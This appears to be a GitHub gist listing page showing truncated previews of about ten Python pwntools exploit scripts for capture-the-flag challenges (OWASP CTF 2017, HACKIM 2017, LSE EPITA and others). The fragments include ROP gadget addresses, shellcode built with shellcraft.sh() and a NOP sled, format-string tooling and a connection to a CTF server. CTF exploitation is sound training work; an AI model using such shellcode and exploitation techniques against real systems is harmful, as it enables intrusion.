This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| import time | |
| pop2ret = 0x8048b84 | |
| pop4ret = 0x8048eec | |
| sendGOT = 0x0804b064 | |
| sendPLT = 0x08048700 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Author : Abdeljalil Nouiri | |
| #exploit For LSE EPITA CTF : Smash Stack 100pts | |
| from pwn import * | |
| import sys | |
| cmd = 0x8049dc8 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Author : Abdeljalil Nouiri | |
| #exploit For LSE EPITA CTF : Tiny Panel 50 pts | |
| from pwn import * | |
| import sys | |
| username = "admin" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| #Author : Abdeljalil Nouiri | |
| # Xiorama CTF - PWN 200 Mint | |
| """ | |
| #LOCAL | |
| sysoff = 0x00040310 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #OWASPCTF 2017 | |
| #sandboxed exploit Code | |
| import itertools,string,hashlib | |
| import time,sys | |
| from pwn import * |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| jmp2heap = 0x804a008 | |
| SC = asm(shellcraft.sh()) | |
| def pwny(s,addr,shellcode): | |
| payload = "" | |
| payload += shellcode | |
| payload += "\x90"*35 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #OWASPCTF 2017 | |
| #ultrababy exploit Code | |
| #Abdeljalil Nouiri | |
| from libformatstr import * | |
| from pwn import * | |
| import sys |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| from libformatstr import * | |
| #Exploit the daemon at 34.198.96.6:9001 | |
| #Exploitation Question 1 : 200 pts | |
| #HACKIM CTF2017 | |
| #exploit by : Abdeljalil Nouiri | |
| con = remote("34.198.96.6" , 9001) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #author : Abdeljalil Nouiri | |
| from pwn import * | |
| user = "charly" | |
| passwd = "h4ckTH1s" | |
| con = process("./flag") |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #ROPASAURUSREX - EXPLOIT | |
| #ABDELJALIL NOUIRI | |
| from time import * | |
| import sys | |
| from pwn import * |